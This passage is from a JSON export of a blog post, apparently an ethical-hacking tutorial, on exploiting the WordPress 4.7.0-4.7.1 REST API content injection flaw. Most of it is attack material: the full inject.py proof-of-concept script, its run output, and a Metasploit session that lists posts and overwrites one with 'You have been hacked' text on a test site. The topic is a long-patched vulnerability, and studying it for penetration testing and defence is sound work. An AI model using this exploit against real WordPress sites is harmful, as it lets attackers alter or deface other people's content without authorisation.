possible to modify the content (<b>content injection<\/b>) of the posts of the targeted <b>WordPress<\/b> blog.<\/p>\n<p>For more information see also: <a href=\"https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html\">https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html<\/a>.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre> | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page\/Post Content Modification via REST API\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8734\n |      - https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html\n |      - https:\/\/blogs.akamai.com\/2017\/02\/wordpress-web-api-vulnerability.html\n |      - https:\/\/gist.github.com\/leonjza\/2244eb15510a0687ed93160c623762ab\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/e357195ce303017d517aff944644a7a1232926f7\n |      - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_content_injection\n<\/pre>\n<\/blockquote>\n<\/div>\n<h3>WordPress 4.7.0-1 Content Injection Exploit &#8211; Inject.py<\/h3>\n<p>To &#8220;<b>exploit<\/b>&#8221; this <b>vulnerability<\/b>, download inject.py from the link provided by <b>WPScan<\/b>: <a href=\"https:\/\/gist.github.com\/leonjza\/2244eb15510a0687ed93160c623762ab\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/gist.github.com\/leonjza\/2244eb15510a0687ed93160c623762ab<\/a> or create the file and paste the code into it.<\/p>\n<p>Create a text file with Vi by running the following command.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>user@workstation:~&gt; vi inject.py\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>Copy the code below and paste it in, then save and exit.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre># 2017 - @leonjza\n#\n# WordPress 4.7.0\/4.7.1 Unauthenticated Content Injection PoC\n# Full bug 
description: https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html\n\n# Usage example:\n#\n# List available posts:\n#\n# $ python inject.py http:\/\/localhost:8070\/\n# * Discovering API Endpoint\n# * API lives at: http:\/\/localhost:8070\/wp-json\/\n# * Getting available posts\n#  - Post ID: 1, Title: test, Url: http:\/\/localhost:8070\/archives\/1\n#\n# Update post with content from a file:\n#\n# $ cat content\n# foo\n#\n# $ python inject.py http:\/\/localhost:8070\/ 1 content\n# * Discovering API Endpoint\n# * API lives at: http:\/\/localhost:8070\/wp-json\/\n# * Updating post 1\n# * Post updated. Check it out at http:\/\/localhost:8070\/archives\/1\n# * Update complete!\n\nimport json\nimport sys\nimport urllib2\n\nfrom lxml import etree\n\n\ndef get_api_url(wordpress_url):\n    response = urllib2.urlopen(wordpress_url)\n\n    data = etree.HTML(response.read())\n    u = data.xpath('\/\/link[@rel=\"https:\/\/api.w.org\/\"]\/@href')[0]\n\n    # check if we have permalinks\n    if 'rest_route' in u:\n        print(' ! Warning, looks like permalinks are not enabled. This might not work!')\n\n    return u\n\n\ndef get_posts(api_base):\n    respone = urllib2.urlopen(api_base + 'wp\/v2\/posts')\n    posts = json.loads(respone.read())\n\n    for post in posts:\n        print(' - Post ID: {0}, Title: {1}, Url: {2}'\n              .format(post['id'], post['title']['rendered'], post['link']))\n\n\ndef update_post(api_base, post_id, post_content):\n    # more than just the content field can be updated. see the api docs here:\n    # https:\/\/developer.wordpress.org\/rest-api\/reference\/posts\/#update-a-post\n    data = json.dumps({\n        'content': post_content\n    })\n\n    url = api_base + 'wp\/v2\/posts\/{post_id}\/?id={post_id}abc'.format(post_id=post_id)\n    req = urllib2.Request(url, data, {'Content-Type': 'application\/json'})\n    response = urllib2.urlopen(req).read()\n\n    print('* Post updated. 
Check it out at {0}'.format(json.loads(response)['link']))\n\n\ndef print_usage():\n    print('Usage: {0} &lt;url&gt; (optional: &lt;post_id&gt; &lt;file with post_content&gt;)'.format(__file__))\n\n\nif __name__ == '__main__':\n\n    # ensure we have at least a url\n    if len(sys.argv) &lt; 2:\n        print_usage()\n        sys.exit(1)\n\n    # if we have a post id, we need content too\n    if 2 &lt; len(sys.argv) &lt; 4:\n        print('Please provide a file with post content with a post id')\n        print_usage()\n        sys.exit(1)\n\n    print('* Discovering API Endpoint')\n    api_url = get_api_url(sys.argv[1])\n    print('* API lives at: {0}'.format(api_url))\n\n    # if we only have a url, show the posts we have\n    if len(sys.argv) &lt; 3:\n        print('* Getting available posts')\n        get_posts(api_url)\n\n        sys.exit(0)\n\n    # if we get here, we have what we need to update a post!\n    print('* Updating post {0}'.format(sys.argv[2]))\n    with open(sys.argv[3], 'r') as content:\n        new_content = content.readlines()\n\n    update_post(api_url, sys.argv[2], ''.join(new_content))\n\nprint('* Update complete!')\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>Once the file has been created or downloaded, run it as follows:<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>user@workstation:~&gt; python inject.py \nUsage: inject.py &lt;url&gt; (optional: &lt;post_id&gt; &lt;file with post_content&gt;)\nuser@workstation:~&gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>If inject.py is run without arguments, the program shows information on its usage.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>user@workstation:~&gt; python inject.py http:\/\/chit-test.ch\n* Discovering API Endpoint\n* API lives at: http:\/\/chit-test.ch\/wp-json\/\n* Getting available posts\n - Post ID: 1, Title: Ciao mondo!, Url: http:\/\/chit-test.ch\/ciao-mondo\/\nuser@workstation:~&gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>If inject.py is run with only the URL, the program shows a list of the existing posts with their 
IDs, useful if you do not know the ID of the post you want to modify.<\/p>\n<p>Once you know the ID, prepare the text file containing the text you want to use to modify the post.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>user@workstation:~&gt; vi content\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>Enter the text you want to use in the file (in this example: You have been hacked, update WordPress!), then save and exit.<\/p>\n<p>Now run inject.py with the post ID and the text file just created.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>user@workstation:~&gt; python inject.py http:\/\/chit-test.ch 1 content\n* Discovering API Endpoint\n* API lives at: http:\/\/chit-test.ch\/wp-json\/\n* Updating post 1\n* Post updated. Check it out at http:\/\/chit-test.ch\/ciao-mondo\/\n* Update complete!\nuser@workstation:~&gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<h3>WordPress REST API Content Injection Exploit with Metasploit<\/h3>\n<p>To &#8220;exploit&#8221; this vulnerability, use the <b>auxiliary\/scanner\/http\/wordpress_content_injection<\/b> module of <b>Metasploit<\/b>. First find the ID of the post you want to modify; to do so, set the action to LIST with the command &#8220;<b>set ACTION LIST<\/b>&#8221;. 
For more information, see the link provided by <b>WPScan<\/b>:<br \/>\n<a title=\"Metasploit WordPress Content Injection\" href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_content_injection\" target=\"_blank\" rel=\"noopener noreferrer\">WordPress Content Injection &#8211; rapid7.com<\/a><\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf &gt; use auxiliary\/scanner\/http\/wordpress_content_injection\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; show actions\n\nAuxiliary actions:\n\nName    Description\n----    -----------\nLIST    List posts\nUPDATE  Update post\n\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; set ACTION LIST\nACTION =&gt; LIST\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; set RHOSTS chit-test.ch\nRHOSTS =&gt; chit-test.ch\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; show options\n\nModule options (auxiliary\/scanner\/http\/wordpress_content_injection):\n\nName           Current Setting  Required  Description\n----           ---------------  --------  -----------\nPOST_CONTENT                    no        Post content\nPOST_ID        0                no        Post ID (0 for all)\nPOST_PASSWORD                   no        Post password ('' for none)\nPOST_TITLE                      no        Post title\nProxies                         no        A proxy chain of format type:host:port[,type:host:port][...]\nRHOSTS         chit-test.ch     yes       The target address range or CIDR identifier\nRPORT          80               yes       The target port (TCP)\nSSL            false            no        Negotiate SSL\/TLS for outgoing connections\nTARGETURI      \/                yes       The base path to the wordpress application\nTHREADS        1                yes       The number of concurrent threads\nVHOST                           no        HTTP server virtual host\n\nAuxiliary action:\n\nName  Description\n----  -----------\nLIST  List posts\n\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; run\n\nPosts at http:\/\/10.10.10.4\/ (REST API: \/wp-json\/wp\/v2)\n======================================================\n\nID  Title                 URL                              Password\n--  -----                 ---                              --------\n1   Ciao mondo!  http:\/\/chit-test.ch\/ciao-mondo\/  No\n\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>Once you know the ID of the post you want to modify, set the action to UPDATE and fill in the remaining information, such as the post content, the title and so on.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf auxiliary(scanner\/http\/wordpress_content_injection) &gt; set ACTION UPDATE\nACTION =&gt; UPDATE\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; set POST_CONTENT \"Sei stato hackerato, aggiorna WordPress!\"\nPOST_CONTENT =&gt; Sei stato hackerato, aggiorna WordPress!\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; set POST_TITLE \"Sei stato hackerato!\"\nPOST_TITLE =&gt; Sei stato hackerato!\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; set POST_ID 1\nPOST_ID =&gt; 1\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; show options\n\nModule options (auxiliary\/scanner\/http\/wordpress_content_injection):\n\n   Name           Current Setting                           Required  Description\n   ----           ---------------                           --------  -----------\n   POST_CONTENT   Sei stato hackerato, aggiorna WordPress!  no        Post content\n   POST_ID        1                                         no        Post ID (0 for all)\n   POST_PASSWORD                                            no        Post password ('' for none)\n   POST_TITLE     Sei stato hackerato!                      no        Post title\n   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS         chit-test.ch                              yes       The target address range or CIDR identifier\n   RPORT          80                                        yes       The target port (TCP)\n   SSL            false                                     no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI      \/                                         yes       The base path to the wordpress application\n   THREADS        1                                         yes       The number of concurrent threads\n   VHOST                                                    no        HTTP server virtual host\n\n\nAuxiliary action:\n\n   Name    Description\n   ----    -----------\n   UPDATE  Update post\n\n\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; run\n\n[+] SUCCESS: http:\/\/10.10.10.4\/?p=1 (Post updated)\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf auxiliary(scanner\/http\/wordpress_content_injection) &gt; \n<\/pre>\n<\/blockquote>\n<\/div>\n<p>Once the <b>vulnerability<\/b> of <b>WordPress 4.7.1<\/b> has been &#8220;exploited&#8221; successfully, look at the targeted site to check that it really worked.<\/p>\n<p><img decoding=\"async\" src=\"..\/..\/..\/grafica\/vittima-wordpress-hackerato.jpg\" alt=\"Hacked WordPress\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this example we will &#8220;exploit&#8221; some vulnerabilities of WordPress version 4.7.1. 
First, scan the site for vulnerabilities with WPScan. Detecting vulnerabilities in WordPress with WPScan workstation:\/home\/chit # wpscan --url http:\/\/chit-test.ch WARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.7 &#8230;<\/p>","protected":false},"author":5,"featured_media":1831,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[268,49,297,144],"tags":[291,121,259,21,10,113,290,12,76,283,16,110,2,292,258],"class_list":["post-1813","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ethical-hacking-penetration-testing","category-sicurezza-informatica-anonimato","category-tutorials","category-articoli-wordpress","tag-content-injection","tag-dos","tag-ethical-hacking","tag-exploit","tag-guida","tag-hacking","tag-hacking-etico","tag-italiano","tag-linux","tag-penetration-testing","tag-sicurezza","tag-vulnerabilita","tag-wordpress","tag-wordpress-4-7-1","tag-wpscan"],"yoast_head_json":{"title":"Hacking WordPress - Content Injection Exploit e DoS &#8226; CHIT","description":"Italian-language guide on how to hack a WordPress site (WordPress 4.7.1) with a Content Injection Exploit.","canonical":"https:\/\/christeninformatica.ch\/it\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/","article_published_time":"2019-05-27T13:30:06+00:00","article_modified_time":"2023-05-09T04:42:52+00:00","author":"chitblog"}}